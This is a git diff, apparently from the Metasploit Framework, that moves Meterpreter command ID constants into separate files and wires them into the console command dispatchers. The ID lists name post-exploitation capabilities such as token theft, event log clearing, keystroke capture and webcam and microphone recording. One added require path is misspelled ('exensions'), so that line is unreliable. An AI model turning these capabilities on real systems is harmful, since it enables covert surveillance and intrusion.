-COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE              = EXTENSION_ID_STDAPI + 36
-COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY                  = EXTENSION_ID_STDAPI + 37
-COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT           = EXTENSION_ID_STDAPI + 38
-COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE                = EXTENSION_ID_STDAPI + 39
-COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT         = EXTENSION_ID_STDAPI + 40
-COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY                  = EXTENSION_ID_STDAPI + 41
-COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY                  = EXTENSION_ID_STDAPI + 42
-COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY           = EXTENSION_ID_STDAPI + 43
-COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS               = EXTENSION_ID_STDAPI + 44
-COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE               = EXTENSION_ID_STDAPI + 45
-COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT        = EXTENSION_ID_STDAPI + 46
-COMMAND_ID_STDAPI_REGISTRY_SET_VALUE                 = EXTENSION_ID_STDAPI + 47
-COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT          = EXTENSION_ID_STDAPI + 48
-COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY                = EXTENSION_ID_STDAPI + 49
-COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST             = EXTENSION_ID_STDAPI + 50
-COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN              = EXTENSION_ID_STDAPI + 51
-COMMAND_ID_STDAPI_SYS_CONFIG_GETENV                  = EXTENSION_ID_STDAPI + 52
-COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS                = EXTENSION_ID_STDAPI + 53
-COMMAND_ID_STDAPI_SYS_CONFIG_GETSID                  = EXTENSION_ID_STDAPI + 54
-COMMAND_ID_STDAPI_SYS_CONFIG_GETUID                  = EXTENSION_ID_STDAPI + 55
-COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME               = EXTENSION_ID_STDAPI + 56
-COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF                = EXTENSION_ID_STDAPI + 57
-COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN             = EXTENSION_ID_STDAPI + 58
-COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO                 = EXTENSION_ID_STDAPI + 59
-COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR                 = EXTENSION_ID_STDAPI + 60
-COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE                 = EXTENSION_ID_STDAPI + 61
-COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS            = EXTENSION_ID_STDAPI + 62
-COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST                = EXTENSION_ID_STDAPI + 63
-COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN                  = EXTENSION_ID_STDAPI + 64
-COMMAND_ID_STDAPI_SYS_EVENTLOG_READ                  = EXTENSION_ID_STDAPI + 65
-COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS              = EXTENSION_ID_STDAPI + 66
-COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH                 = EXTENSION_ID_STDAPI + 67
-COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE                  = EXTENSION_ID_STDAPI + 68
-COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE                = EXTENSION_ID_STDAPI + 69
-COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO               = EXTENSION_ID_STDAPI + 70
-COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES          = EXTENSION_ID_STDAPI + 71
-COMMAND_ID_STDAPI_SYS_PROCESS_GETPID                 = EXTENSION_ID_STDAPI + 72
-COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES       = EXTENSION_ID_STDAPI + 73
-COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = EXTENSION_ID_STDAPI + 74
-COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD             = EXTENSION_ID_STDAPI + 75
-COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD           = EXTENSION_ID_STDAPI + 76
-COMMAND_ID_STDAPI_SYS_PROCESS_KILL                   = EXTENSION_ID_STDAPI + 77
-COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE        = EXTENSION_ID_STDAPI + 78
-COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE            = EXTENSION_ID_STDAPI + 79
-COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK            = EXTENSION_ID_STDAPI + 80
-COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT         = EXTENSION_ID_STDAPI + 81
-COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY           = EXTENSION_ID_STDAPI + 82
-COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ            = EXTENSION_ID_STDAPI + 83
-COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK          = EXTENSION_ID_STDAPI + 84
-COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE           = EXTENSION_ID_STDAPI + 85
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE           = EXTENSION_ID_STDAPI + 86
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE          = EXTENSION_ID_STDAPI + 87
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS     = EXTENSION_ID_STDAPI + 88
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN            = EXTENSION_ID_STDAPI + 89
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS      = EXTENSION_ID_STDAPI + 90
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME          = EXTENSION_ID_STDAPI + 91
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS        = EXTENSION_ID_STDAPI + 92
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND         = EXTENSION_ID_STDAPI + 93
-COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE       = EXTENSION_ID_STDAPI + 94
-COMMAND_ID_STDAPI_SYS_PROCESS_WAIT                   = EXTENSION_ID_STDAPI + 95
-COMMAND_ID_STDAPI_UI_DESKTOP_ENUM                    = EXTENSION_ID_STDAPI + 96
-COMMAND_ID_STDAPI_UI_DESKTOP_GET                     = EXTENSION_ID_STDAPI + 97
-COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT              = EXTENSION_ID_STDAPI + 98
-COMMAND_ID_STDAPI_UI_DESKTOP_SET                     = EXTENSION_ID_STDAPI + 99
-COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD                 = EXTENSION_ID_STDAPI + 100
-COMMAND_ID_STDAPI_UI_ENABLE_MOUSE                    = EXTENSION_ID_STDAPI + 101
-COMMAND_ID_STDAPI_UI_GET_IDLE_TIME                   = EXTENSION_ID_STDAPI + 102
-COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8                   = EXTENSION_ID_STDAPI + 103
-COMMAND_ID_STDAPI_UI_SEND_KEYEVENT                   = EXTENSION_ID_STDAPI + 104
-COMMAND_ID_STDAPI_UI_SEND_KEYS                       = EXTENSION_ID_STDAPI + 105
-COMMAND_ID_STDAPI_UI_SEND_MOUSE                      = EXTENSION_ID_STDAPI + 106
-COMMAND_ID_STDAPI_UI_START_KEYSCAN                   = EXTENSION_ID_STDAPI + 107
-COMMAND_ID_STDAPI_UI_STOP_KEYSCAN                    = EXTENSION_ID_STDAPI + 108
-COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP                  = EXTENSION_ID_STDAPI + 109
-COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD                = EXTENSION_ID_STDAPI + 110
-COMMAND_ID_STDAPI_WEBCAM_GET_FRAME                   = EXTENSION_ID_STDAPI + 111
-COMMAND_ID_STDAPI_WEBCAM_LIST                        = EXTENSION_ID_STDAPI + 112
-COMMAND_ID_STDAPI_WEBCAM_START                       = EXTENSION_ID_STDAPI + 113
-COMMAND_ID_STDAPI_WEBCAM_STOP                        = EXTENSION_ID_STDAPI + 114
-COMMAND_ID_STDAPI_AUDIO_MIC_START                    = EXTENSION_ID_STDAPI + 115
-COMMAND_ID_STDAPI_AUDIO_MIC_STOP                     = EXTENSION_ID_STDAPI + 116
-COMMAND_ID_STDAPI_AUDIO_MIC_LIST                     = EXTENSION_ID_STDAPI + 117
-
-
-
 ##
 #
 # General
diff --git a/lib/rex/post/meterpreter/extensions/unhook/command_ids.rb b/lib/rex/post/meterpreter/extensions/unhook/command_ids.rb
new file mode 100644
index 0000000000000..829cc74ec4936
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/unhook/command_ids.rb
@@ -0,0 +1,18 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Unhook
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_UNHOOK = 10000
+
+# Associated command ids
+COMMAND_ID_UNHOOK_PE = EXTENSION_ID_UNHOOK + 1
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/unhook/tlv.rb b/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
index 13fb1ddf0c17c..179f69b3f2a4b 100644
--- a/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
@@ -5,12 +5,6 @@ module Meterpreter
 module Extensions
 module Unhook
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_UNHOOK = 10000
-
-# Associated command ids
-COMMAND_ID_UNHOOK_PE = EXTENSION_ID_UNHOOK + 1
-
 TLV_TYPE_UNHOOK_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/unhook/unhook.rb b/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
index 7426a1a93cf8d..5d03815552d5d 100644
--- a/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
+++ b/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/unhook/tlv'
+require 'rex/post/meterpreter/extensions/unhook/command_ids'
 
 module Rex
 module Post
@@ -18,7 +19,7 @@ class Unhook < Extension
   UNHOOK_ERROR_SUCCESS = 0
 
   def self.extension_id
-    EXTENSION_ID_UNOOK
+    EXTENSION_ID_UNHOOK
   end
 
   def initialize(client)
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/command_ids.rb b/lib/rex/post/meterpreter/extensions/winpmem/command_ids.rb
new file mode 100644
index 0000000000000..58b0f1170235a
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/winpmem/command_ids.rb
@@ -0,0 +1,18 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Winpmem
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_WINPMEM = 7000
+
+# Associated command ids
+COMMAND_ID_WINPMEM_DUMP_RAM = EXTENSION_ID_WINPMEM + 1
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
index 099ec10c823e3..236b7f41e50e1 100644
--- a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
@@ -5,12 +5,6 @@ module Meterpreter
 module Extensions
 module Winpmem
 
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_WINPMEM = 7000
-
-# Associated command ids
-COMMAND_ID_WINPMEM_DUMP_RAM = EXTENSION_ID_WINPMEM + 1
-
 TLV_TYPE_WINPMEM_ERROR_CODE  = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
 TLV_TYPE_WINPMEM_MEMORY_SIZE = TLV_META_TYPE_QWORD | (TLV_EXTENSIONS + 2)
 
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
index 1e467a9c37ff1..95eee648d1bb3 100644
--- a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
+++ b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/extensions/winpmem/tlv'
+require 'rex/post/meterpreter/extensions/winpmem/command_ids'
 
 module Rex
 module Post
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 3b2c020b0d5bd..5a55b076ef228 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/exensions/android/command_ids'
 require 'msf/core/auxiliary/report'
 require 'rex/google/geolocation'
 require 'date'
@@ -13,8 +14,10 @@ module Ui
 # extension by Anwar Mohamed (@anwarelmakrahy)
 ###
 class Console::CommandDispatcher::Android
+
   include Console::CommandDispatcher
   include Msf::Auxiliary::Report
+  include Rex::Post::Meterpreter::Extensions::Android
 
   #
   # List of supported commands.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb
index e9dcd629a59ec..d90df630f83da 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/appapi/command_ids'
 
 module Rex
 module Post
@@ -13,7 +14,9 @@ module Ui
 #
 ###
 class Console::CommandDispatcher::AppApi
+
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::AppApi
 
   #
   # List of supported commands.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb
index d5a033673c663..156d630873b53 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/extapi/command_ids'
 
 module Rex
 module Post
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Extapi::Adsi
   Klass = Console::CommandDispatcher::Extapi::Adsi
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Extapi
 
   # Zero indicates "no limit"
   DEFAULT_MAX_RESULTS = 0
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
index 0c6bb159b83fb..320f7a3ea1070 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/extapi/command_ids'
 
 module Rex
 module Post
@@ -15,6 +16,7 @@ class Console::CommandDispatcher::Extapi::Clipboard
   Klass = Console::CommandDispatcher::Extapi::Clipboard
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Extapi
 
   #
   # List of supported commands.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb
index ba5c600024b53..7ae9a4b91f84d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/extapi/command_ids'
 
 module Rex
 module Post
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Extapi::Service
   Klass = Console::CommandDispatcher::Extapi::Service
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Extapi
 
   #
   # List of supported commands.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
index 1dfab3938d441..ba8913ab299b8 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/extapi/command_ids'
 
 module Rex
 module Post
@@ -17,6 +18,7 @@ class Console::CommandDispatcher::Extapi::Window
   Klass = Console::CommandDispatcher::Extapi::Window
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Extapi
 
   #
   # List of supported commands.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb
index f7159672a406f..b1e53e210ffbd 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/extapi/command_ids'
 
 module Rex
 module Post
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Extapi::Wmi
   Klass = Console::CommandDispatcher::Extapi::Wmi
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Extapi
 
   # Zero indicates "no limit"
   DEFAULT_MAX_RESULTS = 0
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb
index f0ccb91efb95e..3577ff4e7873d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/lanattacks/command_ids'
 
 module Rex
 module Post
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Lanattacks::Dhcp
   Klass = Console::CommandDispatcher::Lanattacks::Dhcp
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Lanattacks
 
   #
   # List of supported commands.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb
index 5c18d05956ec5..9b38278f0319b 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/lanattacks/command_ids'
 
 module Rex
 module Post
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Lanattacks::Tftp
   Klass = Console::CommandDispatcher::Lanattacks::Tftp
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Lanattacks
 
   #
   # List of supported commands.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
index 5c71863f33a9a..a8d1a44898755 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/sniffer/command_ids'
 
 module Rex
 module Post
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Sniffer
   Klass = Console::CommandDispatcher::Sniffer
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Sniffer
 
   #
   # Initializes an instance of the sniffer command interaction.
@@ -28,27 +30,25 @@ def initialize(shell)
   # List of supported commands.
   #
   def commands
-    #all = {
-    {
+    all = {
       'sniffer_interfaces' => 'Enumerate all sniffable network interfaces',
-      'sniffer_start' => 'Start packet capture on a specific interface',
-      'sniffer_stop'  => 'Stop packet capture on a specific interface',
-      'sniffer_stats' => 'View statistics of an active capture',
-      'sniffer_dump'  => 'Retrieve captured packet data to PCAP file',
-      'sniffer_release' => 'Free captured packets on a specific interface instead of downloading them'
+      'sniffer_start'      => 'Start packet capture on a specific interface',
+      'sniffer_stop'       => 'Stop packet capture on a specific interface',
+      'sniffer_stats'      => 'View statistics of an active capture',
+      'sniffer_dump'       => 'Retrieve captured packet data to PCAP file',
+      'sniffer_release'    => 'Free captured packets on a specific interface instead of downloading them',
     }
 
-    # TODO: Determine why these are commented out
-    #reqs = {
-    #  'sniffer_interfaces' => [COMMAND_ID_NIFFER_INTERFACES],
-    #  'sniffer_start' =>      [COMMAND_ID_NIFFER_CAPTURE_START],
-    #  'sniffer_stop'  =>      [COMMAND_ID_NIFFER_CAPTURE_STOP],
-    #  'sniffer_stats' =>      [COMMAND_ID_NIFFER_CAPTURE_STATS],
-    #  'sniffer_dump'  =>      [COMMAND_ID_NIFFER_CAPTURE_DUMP],
-    #  'sniffer_release' =>    [COMMAND_ID_NIFFER_CAPTURE_RELEASE]
-    #}
-
-    #filter_commands(all, reqs)
+    reqs = {
+      'sniffer_interfaces' => [COMMAND_ID_SNIFFER_INTERFACES],
+      'sniffer_start'      => [COMMAND_ID_SNIFFER_CAPTURE_START],
+      'sniffer_stop'       => [COMMAND_ID_SNIFFER_CAPTURE_STOP],
+      'sniffer_stats'      => [COMMAND_ID_SNIFFER_CAPTURE_STATS],
+      'sniffer_dump'       => [COMMAND_ID_SNIFFER_CAPTURE_DUMP],
+      'sniffer_release'    => [COMMAND_ID_SNIFFER_CAPTURE_RELEASE],
+    }
+
+    filter_commands(all, reqs)
   end
 
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
index ed744476f8e2d..55c1b6d277731 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
@@ -2,6 +2,7 @@
 require 'tempfile'
 require 'filesize'
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/stdapi/command_ids'
 
 module Rex
 module Post
@@ -18,6 +19,7 @@ class Console::CommandDispatcher::Stdapi::Fs
   Klass = Console::CommandDispatcher::Stdapi::Fs
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Stdapi
 
   CHECKSUM_ALGORITHMS = %w{ md5 sha1 }
   private_constant :CHECKSUM_ALGORITHMS
@@ -100,7 +102,7 @@ def commands
       'cat'        => [],
       'cd'         => [COMMAND_ID_STDAPI_FS_CHDIR],
       'checksum'   => [COMMAND_ID_STDAPI_FS_MD5, COMMAND_ID_STDAPI_FS_SHA1],
-      'del'        => [COMMAND_ID_STDAPI_FS_RM],
+      'del'        => [COMMAND_ID_STDAPI_FS_DELETE_FILE],
       'dir'        => [COMMAND_ID_STDAPI_FS_STAT, COMMAND_ID_STDAPI_FS_LS],
       'download'   => [],
       'edit'       => [],
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
index 14f5141ad0232..23e8189eb3d5e 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/stdapi/command_ids'
 require 'bindata'
 
 module Rex
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Stdapi::Mic
   Klass = Console::CommandDispatcher::Stdapi::Mic
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Stdapi
 
   #
   # List of supported commands.
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
index dc07701c9cda4..8ba877e4f06a2 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/stdapi/command_ids'
 require 'rex/service_manager'
 
 module Rex
@@ -17,6 +18,7 @@ class Console::CommandDispatcher::Stdapi::Net
   Klass = Console::CommandDispatcher::Stdapi::Net
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Stdapi
 
   #
   # This module is used to extend the meterpreter session
@@ -426,11 +428,7 @@ def cmd_portfwd(*args)
           direction = 'Forward'
           direction = 'Reverse' if opts['Reverse'] == true
 
-          if opts['Reverse'] == true
-            table << [cnt + 1, "#{rhost}:#{rport}", "#{lhost}:#{lport}", 'Reverse']
-          else
-            table << [cnt + 1, "#{lhost}:#{lport}", "#{rhost}:#{rport}", 'Forward']
-          end
+          table << [cnt + 1, "#{rhost}:#{rport}", "#{lhost}:#{lport}", direction]
 
           cnt += 1
         }
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 4d609a7b743ea..bf67ab34a47f8 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/stdapi/command_ids'
 
 module Rex
 module Post
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Stdapi::Sys
   Klass = Console::CommandDispatcher::Stdapi::Sys
 
   include Console::CommandDispatcher
+  include Rex::Post::Meterpreter::Extensions::Stdapi
 
   #
   # Options used by the 'execute' command.
@@ -1103,7 +1105,6 @@ def cmd_getprivs(*args)
       'Columns'   => ['Name']
     )
 
-    privs = client.sys.config.getprivs
     client.sys.config.getprivs.each do |priv|
       table << [priv]
     end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
index dfa36bff96a31..d274c6c598f74 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/stdapi/command_ids'
 
 module Rex
 module Post
@@ -17,6 +18,7 @@ class Console::CommandDispatcher::Stdapi::Ui
 
   include Console::CommandDispatcher
   include Console::CommandDispatcher::Stdapi::Stream
+  include Rex::Post::Meterpreter::Extensions::Stdapi
 
   #
   # List of supported commands.
@@ -393,15 +395,15 @@ def cmd_keyscan_start(*args)
 
     keyscan_opts.parse(args) { | opt |
       case opt
-       when "-h"
+      when "-h"
         print_line("Usage: keyscan_start <options>")
         print_line("Starts the key logger")
         print_line(keyscan_opts.usage)
         return
-       when "-v"
+      when "-v"
         print_line("Verbose logging selected ...")
         trackwin = true
-       end
+      end
     }
 
     print_line("Starting the keystroke sniffer ...")
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
index d897ceb75fad5..aa9fce3fb1f32 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/stdapi/command_ids'
 
 module Rex
 module Post
@@ -16,6 +17,7 @@ class Console::CommandDispatcher::Stdapi::Webcam
 
   include Console::CommandDispatcher
   include Console::CommandDispatcher::Stdapi::Stream
+  include Rex::Post::Meterpreter::Extensions::Stdapi
 
   #
   # List of supported commands.

From 1fd771c092852ff1d97bc4a272734f6c32015da1 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
